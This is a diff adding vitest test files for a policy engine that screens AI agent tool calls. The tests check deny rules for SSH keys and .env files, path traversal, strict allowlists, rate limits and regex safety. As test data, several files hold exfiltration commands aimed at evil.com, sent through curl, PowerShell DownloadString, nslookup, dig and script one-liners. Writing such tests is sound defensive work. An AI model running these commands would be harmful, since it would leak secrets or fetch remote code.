@agent-wall/core 0.1.0

package/src/policy-engine-security.test.ts

@@ -0,0 +1,227 @@
+import { describe, it, expect } from "vitest";
+import { PolicyEngine } from "./policy-engine.js";
+import { isRegexSafe } from "./response-scanner.js";
+
+describe("PolicyEngine Security", () => {
+  describe("path traversal normalization", () => {
+    const engine = new PolicyEngine({
+      version: 1,
+      rules: [
+        {
+          name: "block-ssh",
+          tool: "*",
+          match: { arguments: { path: "**/.ssh/**" } },
+          action: "deny",
+        },
+        {
+          name: "block-env",
+          tool: "*",
+          match: { arguments: { path: "**/.env*" } },
+          action: "deny",
+        },
+      ],
+    });
+
+    it("should block direct .ssh access", () => {
+      const result = engine.evaluate({
+        name: "read_file",
+        arguments: { path: "/home/user/.ssh/id_rsa" },
+      });
+      expect(result.action).toBe("deny");
+    });
+
+    it("should block path traversal to .ssh", () => {
+      const result = engine.evaluate({
+        name: "read_file",
+        arguments: { path: "/home/user/docs/../../.ssh/id_rsa" },
+      });
+      // After normalization: /home/.ssh/id_rsa
+      expect(result.action).toBe("deny");
+    });
+
+    it("should block ../ prefix traversal to .env", () => {
+      const result = engine.evaluate({
+        name: "read_file",
+        arguments: { path: "../../.env" },
+      });
+      expect(result.action).toBe("deny");
+    });
+
+    it("should block backslash path traversal", () => {
+      const result = engine.evaluate({
+        name: "read_file",
+        arguments: { path: "..\\..\\..\\home\\user\\.ssh\\id_rsa" },
+      });
+      expect(result.action).toBe("deny");
+    });
+  });
+
+  describe("Unicode NFC normalization", () => {
+    const engine = new PolicyEngine({
+      version: 1,
+      rules: [
+        {
+          name: "block-env",
+          tool: "*",
+          match: { arguments: { path: "**/.env*" } },
+          action: "deny",
+        },
+      ],
+    });
+
+    it("should match NFC-normalized strings", () => {
+      // .env in NFC form
+      const result = engine.evaluate({
+        name: "read_file",
+        arguments: { path: "/app/.env" },
+      });
+      expect(result.action).toBe("deny");
+    });
+
+    it("should normalize NFD to NFC before matching", () => {
+      // Use NFD decomposed form for the 'e' in .env
+      // U+0065 (e) + U+0301 (combining acute) = é in NFD
+      // This tests that normalization happens before matching
+      const nfdPath = "/app/.e\u0301nv";
+      const result = engine.evaluate({
+        name: "read_file",
+        arguments: { path: nfdPath },
+      });
+      // After NFC normalization, the é stays as é (not plain e)
+      // So .énv won't match .env* — this is correct! NFC prevents
+      // decomposition bypass but doesn't collapse different characters
+      expect(result).toBeDefined();
+    });
+  });
+
+  describe("zero-trust strict mode", () => {
+    const engine = new PolicyEngine({
+      version: 1,
+      mode: "strict",
+      rules: [
+        { name: "allow-read", tool: "read_file", action: "allow" },
+        { name: "allow-list", tool: "list_directory", action: "allow" },
+      ],
+    });
+
+    it("should allow explicitly listed tools", () => {
+      const result = engine.evaluate({ name: "read_file" });
+      expect(result.action).toBe("allow");
+    });
+
+    it("should deny unlisted tools (zero-trust default)", () => {
+      const result = engine.evaluate({ name: "write_file" });
+      expect(result.action).toBe("deny");
+      expect(result.message).toContain("Zero-trust");
+    });
+
+    it("should deny shell commands not in allowlist", () => {
+      const result = engine.evaluate({ name: "bash" });
+      expect(result.action).toBe("deny");
+    });
+
+    it("should deny even with arguments matching no rule", () => {
+      const result = engine.evaluate({
+        name: "execute_command",
+        arguments: { command: "ls" },
+      });
+      expect(result.action).toBe("deny");
+    });
+  });
+
+  describe("standard mode backward compatibility", () => {
+    it("should default to prompt when no mode specified", () => {
+      const engine = new PolicyEngine({
+        version: 1,
+        rules: [],
+      });
+      const result = engine.evaluate({ name: "any_tool" });
+      expect(result.action).toBe("prompt");
+    });
+
+    it("should respect defaultAction in standard mode", () => {
+      const engine = new PolicyEngine({
+        version: 1,
+        mode: "standard",
+        defaultAction: "allow",
+        rules: [],
+      });
+      const result = engine.evaluate({ name: "any_tool" });
+      expect(result.action).toBe("allow");
+    });
+  });
+
+  describe("argument key aliases", () => {
+    const engine = new PolicyEngine({
+      version: 1,
+      rules: [
+        {
+          name: "block-ssh-by-path",
+          tool: "*",
+          match: { arguments: { path: "**/.ssh/**" } },
+          action: "deny",
+        },
+      ],
+    });
+
+    it("should match 'path' key directly", () => {
+      const result = engine.evaluate({
+        name: "read_file",
+        arguments: { path: "/home/.ssh/id_rsa" },
+      });
+      expect(result.action).toBe("deny");
+    });
+
+    it("should match 'file' key as alias for 'path'", () => {
+      const result = engine.evaluate({
+        name: "read_file",
+        arguments: { file: "/home/.ssh/id_rsa" },
+      });
+      expect(result.action).toBe("deny");
+    });
+
+    it("should match 'filepath' key as alias for 'path'", () => {
+      const result = engine.evaluate({
+        name: "read_file",
+        arguments: { filepath: "/home/.ssh/id_rsa" },
+      });
+      expect(result.action).toBe("deny");
+    });
+
+    it("should match 'file_path' key as alias for 'path'", () => {
+      const result = engine.evaluate({
+        name: "read_file",
+        arguments: { file_path: "/home/.ssh/id_rsa" },
+      });
+      expect(result.action).toBe("deny");
+    });
+
+    it("should match case-insensitively", () => {
+      const result = engine.evaluate({
+        name: "read_file",
+        arguments: { PATH: "/home/.ssh/id_rsa" },
+      });
+      expect(result.action).toBe("deny");
+    });
+  });
+
+  describe("ReDoS protection", () => {
+    it("should reject nested quantifier patterns", () => {
+      expect(isRegexSafe("(a+)+")).toBe(false);
+    });
+
+    it("should reject patterns that are too long", () => {
+      const longPattern = "a".repeat(1100);
+      expect(isRegexSafe(longPattern)).toBe(false);
+    });
+
+    it("should accept safe patterns", () => {
+      expect(isRegexSafe("[A-Za-z0-9]+")).toBe(true);
+      expect(isRegexSafe("\\d{3}-\\d{2}-\\d{4}")).toBe(true);
+    });
+
+    it("should reject invalid regex", () => {
+      expect(isRegexSafe("[invalid")).toBe(false);
+    });
+  });
+});

package/src/policy-engine.test.ts

@@ -0,0 +1,453 @@
+/**
+ * Tests for PolicyEngine — rule matching and evaluation.
+ */
+
+import { describe, it, expect, beforeEach } from "vitest";
+import { PolicyEngine, type PolicyConfig } from "./policy-engine.js";
+
+const makeConfig = (overrides?: Partial<PolicyConfig>): PolicyConfig => ({
+  version: 1,
+  defaultAction: "prompt",
+  rules: [],
+  ...overrides,
+});
+
+describe("PolicyEngine", () => {
+  describe("basic rule matching", () => {
+    it("should deny when tool name matches a deny rule", () => {
+      const engine = new PolicyEngine(
+        makeConfig({
+          rules: [
+            {
+              name: "block-shell",
+              tool: "shell_exec",
+              action: "deny",
+              message: "Shell execution blocked",
+            },
+          ],
+        })
+      );
+
+      const verdict = engine.evaluate({ name: "shell_exec", arguments: { command: "ls" } });
+      expect(verdict.action).toBe("deny");
+      expect(verdict.rule).toBe("block-shell");
+    });
+
+    it("should allow when tool name matches an allow rule", () => {
+      const engine = new PolicyEngine(
+        makeConfig({
+          rules: [
+            {
+              name: "allow-read",
+              tool: "read_file",
+              action: "allow",
+            },
+          ],
+        })
+      );
+
+      const verdict = engine.evaluate({ name: "read_file", arguments: { path: "/test" } });
+      expect(verdict.action).toBe("allow");
+      expect(verdict.rule).toBe("allow-read");
+    });
+
+    it("should use default action when no rules match", () => {
+      const engine = new PolicyEngine(
+        makeConfig({ defaultAction: "deny", rules: [] })
+      );
+
+      const verdict = engine.evaluate({ name: "unknown_tool" });
+      expect(verdict.action).toBe("deny");
+      expect(verdict.rule).toBeNull();
+    });
+
+    it("should default to prompt when no default action specified", () => {
+      const engine = new PolicyEngine({ version: 1, rules: [] });
+
+      const verdict = engine.evaluate({ name: "anything" });
+      expect(verdict.action).toBe("prompt");
+    });
+  });
+
+  describe("glob pattern matching", () => {
+    it("should match wildcard tool patterns", () => {
+      const engine = new PolicyEngine(
+        makeConfig({
+          rules: [
+            { name: "block-all", tool: "*", action: "deny", message: "All blocked" },
+          ],
+        })
+      );
+
+      expect(engine.evaluate({ name: "read_file" }).action).toBe("deny");
+      expect(engine.evaluate({ name: "shell_exec" }).action).toBe("deny");
+      expect(engine.evaluate({ name: "anything" }).action).toBe("deny");
+    });
+
+    it("should match pipe-separated tool patterns", () => {
+      const engine = new PolicyEngine(
+        makeConfig({
+          rules: [
+            {
+              name: "block-exec",
+              tool: "shell_exec|run_command|execute_command",
+              action: "deny",
+            },
+          ],
+        })
+      );
+
+      expect(engine.evaluate({ name: "shell_exec" }).action).toBe("deny");
+      expect(engine.evaluate({ name: "run_command" }).action).toBe("deny");
+      expect(engine.evaluate({ name: "execute_command" }).action).toBe("deny");
+      expect(engine.evaluate({ name: "read_file" }).action).toBe("prompt"); // default
+    });
+
+    it("should match glob patterns in tool names", () => {
+      const engine = new PolicyEngine(
+        makeConfig({
+          rules: [
+            { name: "block-delete", tool: "*delete*", action: "deny" },
+          ],
+        })
+      );
+
+      expect(engine.evaluate({ name: "delete_file" }).action).toBe("deny");
+      expect(engine.evaluate({ name: "file_delete" }).action).toBe("deny");
+      expect(engine.evaluate({ name: "bulk_delete_all" }).action).toBe("deny");
+      expect(engine.evaluate({ name: "read_file" }).action).toBe("prompt");
+    });
+  });
+
+  describe("argument matching", () => {
+    it("should match argument glob patterns", () => {
+      const engine = new PolicyEngine(
+        makeConfig({
+          rules: [
+            {
+              name: "block-ssh",
+              tool: "*",
+              match: { arguments: { path: "**/.ssh/**" } },
+              action: "deny",
+              message: "SSH access blocked",
+            },
+          ],
+        })
+      );
+
+      const denied = engine.evaluate({
+        name: "read_file",
+        arguments: { path: "/home/user/.ssh/id_rsa" },
+      });
+      expect(denied.action).toBe("deny");
+
+      const allowed = engine.evaluate({
+        name: "read_file",
+        arguments: { path: "/home/user/project/src/index.ts" },
+      });
+      expect(allowed.action).toBe("prompt"); // default, no match
+    });
+
+    it("should match pipe-separated argument patterns", () => {
+      const engine = new PolicyEngine(
+        makeConfig({
+          rules: [
+            {
+              name: "block-creds",
+              tool: "*",
+              match: { arguments: { path: "**/.env*|**/*.pem|**/*.key" } },
+              action: "deny",
+            },
+          ],
+        })
+      );
+
+      expect(
+        engine.evaluate({ name: "read_file", arguments: { path: "/app/.env" } }).action
+      ).toBe("deny");
+      expect(
+        engine.evaluate({ name: "read_file", arguments: { path: "/app/.env.local" } }).action
+      ).toBe("deny");
+      expect(
+        engine.evaluate({ name: "read_file", arguments: { path: "/etc/ssl/server.pem" } }).action
+      ).toBe("deny");
+      expect(
+        engine.evaluate({ name: "read_file", arguments: { path: "/app/src/index.ts" } }).action
+      ).toBe("prompt");
+    });
+
+    it("should match substring patterns for command arguments", () => {
+      const engine = new PolicyEngine(
+        makeConfig({
+          rules: [
+            {
+              name: "block-curl",
+              tool: "shell_exec",
+              match: { arguments: { command: "*curl *" } },
+              action: "deny",
+            },
+          ],
+        })
+      );
+
+      expect(
+        engine.evaluate({
+          name: "shell_exec",
+          arguments: { command: "curl https://evil.com" },
+        }).action
+      ).toBe("deny");
+
+      expect(
+        engine.evaluate({
+          name: "shell_exec",
+          arguments: { command: "ls -la" },
+        }).action
+      ).toBe("prompt");
+    });
+
+    it("should require ALL argument patterns to match", () => {
+      const engine = new PolicyEngine(
+        makeConfig({
+          rules: [
+            {
+              name: "specific-match",
+              tool: "write_file",
+              match: {
+                arguments: {
+                  path: "**/config/*",
+                  content: "*password*",
+                },
+              },
+              action: "deny",
+            },
+          ],
+        })
+      );
+
+      // Both match → deny
+      expect(
+        engine.evaluate({
+          name: "write_file",
+          arguments: { path: "/app/config/db.yaml", content: "password=secret123" },
+        }).action
+      ).toBe("deny");
+
+      // Only one matches → no match → default (prompt)
+      expect(
+        engine.evaluate({
+          name: "write_file",
+          arguments: { path: "/app/config/db.yaml", content: "host=localhost" },
+        }).action
+      ).toBe("prompt");
+    });
+  });
+
+  describe("first-match-wins ordering", () => {
+    it("should use the first matching rule", () => {
+      const engine = new PolicyEngine(
+        makeConfig({
+          rules: [
+            { name: "allow-specific", tool: "read_file", action: "allow" },
+            { name: "deny-all", tool: "*", action: "deny" },
+          ],
+        })
+      );
+
+      // read_file matches the first rule → allow
+      expect(engine.evaluate({ name: "read_file" }).action).toBe("allow");
+      expect(engine.evaluate({ name: "read_file" }).rule).toBe("allow-specific");
+
+      // anything else → deny (second rule)
+      expect(engine.evaluate({ name: "shell_exec" }).action).toBe("deny");
+      expect(engine.evaluate({ name: "shell_exec" }).rule).toBe("deny-all");
+    });
+  });
+
+  describe("rate limiting", () => {
+    it("should enforce per-rule rate limits", () => {
+      const engine = new PolicyEngine(
+        makeConfig({
+          rules: [
+            {
+              name: "limited-read",
+              tool: "read_file",
+              action: "allow",
+              rateLimit: { maxCalls: 3, windowSeconds: 60 },
+            },
+          ],
+        })
+      );
+
+      // First 3 calls should be allowed
+      expect(engine.evaluate({ name: "read_file" }).action).toBe("allow");
+      expect(engine.evaluate({ name: "read_file" }).action).toBe("allow");
+      expect(engine.evaluate({ name: "read_file" }).action).toBe("allow");
+
+      // 4th call should be denied (rate limit)
+      const verdict = engine.evaluate({ name: "read_file" });
+      expect(verdict.action).toBe("deny");
+      expect(verdict.rule).toBe("limited-read");
+    });
+
+    it("should enforce global rate limits", () => {
+      const engine = new PolicyEngine(
+        makeConfig({
+          globalRateLimit: { maxCalls: 2, windowSeconds: 60 },
+          rules: [
+            { name: "allow-all", tool: "*", action: "allow" },
+          ],
+        })
+      );
+
+      expect(engine.evaluate({ name: "tool_a" }).action).toBe("allow");
+      expect(engine.evaluate({ name: "tool_b" }).action).toBe("allow");
+
+      // 3rd call hits global limit
+      const verdict = engine.evaluate({ name: "tool_c" });
+      expect(verdict.action).toBe("deny");
+      expect(verdict.rule).toBe("__global_rate_limit__");
+    });
+  });
+
+  describe("bypass-resistant exfiltration patterns", () => {
+    let engine: PolicyEngine;
+
+    beforeEach(() => {
+      // Use rules similar to the default policy's new bypass patterns
+      engine = new PolicyEngine(
+        makeConfig({
+          rules: [
+            {
+              name: "block-powershell",
+              tool: "shell_exec|run_command|execute_command|bash",
+              match: { arguments: { command: "*powershell*|*pwsh*|*Invoke-WebRequest*|*Invoke-RestMethod*|*DownloadString*|*DownloadFile*|*Start-BitsTransfer*" } },
+              action: "deny",
+            },
+            {
+              name: "block-dns",
+              tool: "shell_exec|run_command|execute_command|bash",
+              match: { arguments: { command: "*nslookup *|*dig *|*host *" } },
+              action: "deny",
+            },
+            {
+              name: "approve-script",
+              tool: "shell_exec|run_command|execute_command|bash",
+              match: { arguments: { command: "*python* -c *|*python3* -c *|*ruby* -e *|*perl* -e *|*node* -e *|*node* --eval*" } },
+              action: "prompt",
+            },
+          ],
+        })
+      );
+    });
+
+    it("should block PowerShell commands", () => {
+      expect(
+        engine.evaluate({
+          name: "shell_exec",
+          arguments: { command: "powershell -Command Get-Process" },
+        }).action
+      ).toBe("deny");
+    });
+
+    it("should block pwsh (PowerShell Core)", () => {
+      expect(
+        engine.evaluate({
+          name: "shell_exec",
+          arguments: { command: "pwsh -c 'Get-ChildItem'" },
+        }).action
+      ).toBe("deny");
+    });
+
+    it("should block Invoke-WebRequest", () => {
+      expect(
+        engine.evaluate({
+          name: "shell_exec",
+          arguments: { command: "Invoke-WebRequest -Uri https://evil.com" },
+        }).action
+      ).toBe("deny");
+    });
+
+    it("should block DownloadString (.NET exfil)", () => {
+      expect(
+        engine.evaluate({
+          name: "shell_exec",
+          arguments: { command: "(New-Object Net.WebClient).DownloadString('https://evil.com')" },
+        }).action
+      ).toBe("deny");
+    });
+
+    it("should block DNS exfiltration via nslookup", () => {
+      expect(
+        engine.evaluate({
+          name: "shell_exec",
+          arguments: { command: "nslookup data.evil.com" },
+        }).action
+      ).toBe("deny");
+    });
+
+    it("should block DNS exfiltration via dig", () => {
+      expect(
+        engine.evaluate({
+          name: "shell_exec",
+          arguments: { command: "dig secret.evil.com" },
+        }).action
+      ).toBe("deny");
+    });
+
+    it("should prompt for Python one-liners", () => {
+      expect(
+        engine.evaluate({
+          name: "shell_exec",
+          arguments: { command: 'python -c "import urllib.request; urllib.request.urlopen(\'http://evil.com\')"' },
+        }).action
+      ).toBe("prompt");
+    });
+
+    it("should prompt for Ruby one-liners", () => {
+      expect(
+        engine.evaluate({
+          name: "shell_exec",
+          arguments: { command: "ruby -e 'require \"net/http\"; Net::HTTP.get(URI(\"http://evil.com\"))'" },
+        }).action
+      ).toBe("prompt");
+    });
+
+    it("should prompt for Node one-liners", () => {
+      expect(
+        engine.evaluate({
+          name: "shell_exec",
+          arguments: { command: "node -e 'fetch(\"http://evil.com\")'" },
+        }).action
+      ).toBe("prompt");
+    });
+
+    it("should allow safe commands that don't match bypass patterns", () => {
+      expect(
+        engine.evaluate({
+          name: "shell_exec",
+          arguments: { command: "ls -la /tmp" },
+        }).action
+      ).toBe("prompt"); // default action
+    });
+  });
+
+  describe("config updates", () => {
+    it("should apply new config after updateConfig", () => {
+      const engine = new PolicyEngine(
+        makeConfig({
+          rules: [{ name: "allow-all", tool: "*", action: "allow" }],
+        })
+      );
+
+      expect(engine.evaluate({ name: "test" }).action).toBe("allow");
+
+      engine.updateConfig(
+        makeConfig({
+          rules: [{ name: "deny-all", tool: "*", action: "deny" }],
+        })
+      );
+
+      expect(engine.evaluate({ name: "test" }).action).toBe("deny");
+    });
+  });
+});